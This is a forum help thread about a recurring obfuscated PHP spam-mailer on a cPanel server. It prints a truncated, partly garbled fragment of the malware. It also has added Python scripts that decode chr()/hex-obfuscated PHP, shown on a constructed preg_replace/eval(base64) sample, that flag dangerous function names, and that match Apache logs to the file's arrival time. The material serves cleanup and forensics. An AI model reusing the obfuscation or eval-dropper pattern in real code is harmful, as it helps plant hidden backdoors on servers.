Virus keeps appearing. How can i find the security hole?

0

I just started working with this client recently, and when I got into his server, it was full of viruses. At least 4 of his cPanel users had viruses on their websites (completely managed by him). The viruses were sending spam emails at a rate of 5 per second when I started. I went through and removed all of the viruses, worked on security holes, etc. I stopped all spam emails from coming in, but there's a single PHP file that keeps reappearing every time I delete it. I deleted it on March 31; the single file reappeared on April 2. I deleted it on April 3; it reappeared April 7. I'm wondering if anybody has a suggestion for how I can find the security hole.

The directory has a total of 9 files in it, only one of which is PHP, not including the virus itself. It's a very small website, and it's almost completely HTML. The only other PHP file is a contact form. I don't think it's anything within the directory, but no other viruses appear anywhere else on the system.

Any suggestions?

EDIT

This is what the virus code looks like, all on a single line. It's 3585 characters long.

$f7pm25=chr(112)."re".chr(10chr(103).chr(95)."\x72".chr(101).
"p\x6C\x61".chr(99)."e";$q1Y7Aj="e".chr(118)."\x61".chr(108)."
(b\x61\x73\x65\x364\x5F\x64".chr(101).chr(99)."o\x64".chr(101)."\x28\x22\x5
1".chr(71)."\x56".chr(121)."\x63\x6d".chr(57).chr(121)."\x58\x33J".chr(108)
."

Katushai

Posted 2016-04-07T16:07:11.503

Reputation: 113
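The fragment posted above is built from three constructs: chr(N) calls, double-quoted strings carrying \xHH escapes, and "." concatenation. The script below is an added example, not part of the original post: it statically evaluates those constructs so each string reads the way the PHP interpreter sees it, substitutes variables that have already been decoded into later statements, then flags names such as eval, base64_decode and preg_replace and unwraps anything that parses as base64. It runs on a constructed sample written in the same style; the variable names and the base64 payload are made up for the example, and the poster's 3585-character file (truncated in the post, with one garbled token) is not reproduced here.

```python
import base64
import re

# Constructed sample in the style of the posted fragment: chr() calls, "\xHH" escapes
# and "." concatenation. Variable names and the base64 payload are made up for this
# example; this is NOT the poster's file.
SAMPLE = r'''
$a=chr(112)."re".chr(103).chr(95)."\x72".chr(101)."p\x6C\x61".chr(99)."e";
$b="e".chr(118)."\x61".chr(108)."(b\x61\x73\x65\x364\x5F\x64".chr(101).chr(99)."o\x64".chr(101)."\x28\x22";
$c="ZWNobyAiaGkiOw==";
$a("/.*/e", $b.$c.'"));', "x");
'''

# One token per obfuscation construct: chr(N), "double-quoted", 'single-quoted', $variable.
TOKEN = re.compile(r'chr\(\s*(\d+)\s*\)|"((?:\\.|[^"\\])*)"|\'((?:\\.|[^\'\\])*)\'|(\$\w+)')
ASSIGN = re.compile(r'(\$\w+)\s*=\s*(.*)', re.S)
B64 = re.compile(r'[A-Za-z0-9+/]+={0,2}')
# Names that, once decoded, mark a string as code that loads or runs more code.
# preg_replace is listed because its /e modifier (deprecated in PHP 5.5, removed in
# 7.0) executed the replacement string as PHP, a classic dropper trick.
SUSPICIOUS = ('eval', 'assert', 'base64_decode', 'preg_replace', 'create_function',
              'system', 'shell_exec', 'passthru', 'gzinflate', 'str_rot13')


def php_unescape(body):
    """Resolve the escapes PHP allows in a double-quoted string: \\xHH, \\n, \\", \\$ ..."""
    simple = {'n': '\n', 'r': '\r', 't': '\t', '\\': '\\', '"': '"', '$': '$'}

    def repl(m):
        esc = m.group(1)
        if esc[0] == 'x' and len(esc) > 1:
            return chr(int(esc[1:], 16))      # "\x364" is "\x36" followed by a literal 4
        return simple.get(esc, '\\' + esc)
    return re.sub(r'\\(x[0-9A-Fa-f]{1,2}|.)', repl, body)


def split_statements(code):
    """Split on ';' while ignoring semicolons that sit inside quoted strings."""
    stmts, buf, quote, i = [], [], None, 0
    while i < len(code):
        c = code[i]
        if quote:
            buf.append(c)
            if c == '\\' and i + 1 < len(code):
                i += 1
                buf.append(code[i])
            elif c == quote:
                quote = None
        elif c in '"\'':
            quote = c
            buf.append(c)
        elif c == ';':
            stmts.append(''.join(buf))
            buf = []
        else:
            buf.append(c)
        i += 1
    if ''.join(buf).strip():
        stmts.append(''.join(buf))
    return [s.strip() for s in stmts if s.strip()]


def decode_concat(expr, known):
    """Evaluate chr()/string/variable tokens, drop the '.' operators, pass other punctuation through."""
    out, pos = [], 0
    for m in TOKEN.finditer(expr):
        gap = expr[pos:m.start()].replace('.', '').strip()
        if gap:
            out.append(gap)
        pos = m.end()
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        elif m.group(2) is not None:
            out.append(php_unescape(m.group(2)))
        elif m.group(3) is not None:
            out.append(m.group(3).replace("\\'", "'").replace('\\\\', '\\'))
        else:
            out.append(known.get(m.group(4), m.group(4)))   # unknown variables stay as $name
    tail = expr[pos:].replace('.', '').strip()
    if tail:
        out.append(tail)
    return ''.join(out)


def deobfuscate(code):
    """Return ({variable: decoded string}, [readable statement, ...]) for the whole snippet."""
    known, rendered = {}, []
    for stmt in split_statements(code):
        m = ASSIGN.match(stmt)
        if m:
            known[m.group(1)] = decode_concat(m.group(2), known)
            rendered.append(f'{m.group(1)} = {known[m.group(1)]!r}')
        else:
            rendered.append(decode_concat(stmt, known))
    return known, rendered


def flag_suspicious(known):
    """Name the dangerous calls each decoded string contains, and unwrap base64 where it parses."""
    findings = {}
    for var, text in known.items():
        hits = [name for name in SUSPICIOUS if name in text]
        if len(text) >= 8 and len(text) % 4 == 0 and B64.fullmatch(text):
            try:
                hits.append('base64:' + base64.b64decode(text, validate=True).decode('utf-8'))
            except (ValueError, UnicodeDecodeError):
                pass
        if hits:
            findings[var] = hits
    return findings


if __name__ == '__main__':
    variables, statements = deobfuscate(SAMPLE)
    for line in statements:
        print(line)
    for var, hits in flag_suspicious(variables).items():
        print(var, '->', ', '.join(hits))
```

Run against the real file, the decoded strings are what you search for (and what you feed to VirusTotal or a web search), since the chr()/hex spelling exists precisely so that a grep for eval or base64_decode finds nothing. A second layer is common: once a base64 blob decodes to more PHP, feed that PHP back through deobfuscate() rather than trusting the first pass.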

There's no single way to check for all viruses and things like that, unfortunately. Your safest bet is to back up the files for the website, check them and then rebuild the server (or have the hosting company reset your portal) if you believe there is still a virus. Unless you know more about what type of malware it is (i.e., does that PHP file appear on VirusTotal or elsewhere? Does the name come up in searches? What about the content?) it is almost impossible to verify it's all been cleared out. – Abraxas – 2016-04-07T16:12:27.677

Right, it is hard to do. It's a VPS, owned by my boss and managed by me, now. I added a snippet of code from the virus above – Katushai – 2016-04-07T16:14:57.243

Also, it isn't detected by any virus scanners or malware detectors. But it's definitely the virus that's sending out the emails. It came up as the source of emails in exim_mainlog – Katushai – 2016-04-07T16:18:04.320

It sounds like you should take the "nuke from orbit" approach. This means you configure the server from scratch, or disable the user's account that is infecting the server and create them a new account. – Ramhound – 2016-04-07T16:19:29.767

You think? That wouldn't be that hard to do, actually. Luckily I have access to everything and I don't have to go through any red tape. I just wish I knew what the security hole was, so I know to close it in the future. If anybody has a good list of common security holes I'll upvote it – Katushai – 2016-04-07T16:20:48.367

Yes, if you want to be secure, start over. You have no idea what task is triggering the file to be created, what user is creating it, etc. Even if it was as simple as someone compromising your server and setting up a malicious cron job, you have no way to know if they put other stuff in other places. Also, this isn't really a place to say 'how do I secure X against hacking'. It's much more a forum for questions like 'how do I secure this single thing from that single thing'. But the obvious tips are: don't use default passwords, use separate accounts, stay up to date, minimize surface (fewest services) – Abraxas – 2016-04-07T16:25:27.197

You can compare records from your Apache log with the creation time of that virus file to catch the suspicious IP and the HTTP request from it. – Oleg Bolden – 2016-04-07T20:11:01.043
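The correlation suggested in the comment above, as working code (an added example, not from the thread): read the dropped file's modification time with stat, pull every access-log request that falls within a window around that time, list POSTs and requests to PHP scripts first, and count which client addresses were active. The log lines, file names, addresses and file time below are constructed for the example; on the real server you would pass the domain's Apache access log (cPanel keeps per-domain logs under /usr/local/apache/domlogs) and the result of file_mtime() on the dropped file. The sample puts a POST to the site's one form script at the file's timestamp only to show what a hit looks like; whether that is the actual entry point is exactly what running this against the real log would tell you.

```python
import os
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed Apache "combined" log lines for the example (not from the poster's server).
# Hosts, paths and user agents are made up.
LOG_LINES = """\
203.0.113.5 - - [02/Apr/2016:03:14:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Apr/2016:03:16:40 +0000] "POST /contact.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Apr/2016:03:16:41 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Apr/2016:03:17:05 +0000] "POST /dropped.php?x=1 HTTP/1.1" 200 17 "-" "python-requests/2.9"
203.0.113.9 - - [02/Apr/2016:09:00:00 +0000] "GET /about.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Stand-in for file_mtime(path_of_dropped_file): the moment the file showed up (constructed).
FILE_TIME = datetime(2016, 4, 2, 3, 16, 40, tzinfo=timezone.utc)

# Apache combined log format, one record per line.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the fields of one combined-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['ts'] = datetime.strptime(rec['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return rec


def file_mtime(path):
    """Most Linux filesystems expose no creation time through stat; for a file that was just
    dropped, mtime is the arrival time unless the dropper deliberately reset it."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def requests_near(lines, when, window=timedelta(minutes=5)):
    """Requests within +/- window of `when`, POSTs and PHP hits first, then closest in time."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        delta = abs((rec['ts'] - when).total_seconds())
        if delta <= window.total_seconds():
            script = rec['path'].split('?', 1)[0].lower()      # ignore the query string
            rec['delta'] = delta
            rec['suspicious'] = rec['method'] == 'POST' or script.endswith('.php')
            hits.append(rec)
    hits.sort(key=lambda r: (not r['suspicious'], r['delta']))
    return hits


def ips_in(hits):
    """How many of the nearby requests each client address made."""
    return Counter(h['ip'] for h in hits)


if __name__ == '__main__':
    nearby = requests_near(LOG_LINES.splitlines(), FILE_TIME, timedelta(minutes=2))
    for h in nearby:
        print(f"{h['delta']:6.0f}s  {h['ip']:15} {h['method']:4} {h['path']}  {h['status']}  {h['ua']}")
    print(ips_in(nearby).most_common())
```

Two things the output tells you. If a request lines up with the file time, its path is the script that wrote the file and its address is where to look for the rest of that session (grep the same IP across all domlogs, since the other cPanel accounts were infected too). If nothing in any web log lines up, the file is not arriving over HTTP, and the next places to check are the user's crontab and any process still running under that account, which is the scenario the earlier comment about a malicious cron job describes.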

This is a simple but effective firewall: http://www.php-firewall.info – Oleg Bolden – 2016-04-07T20:19:12.570

No answers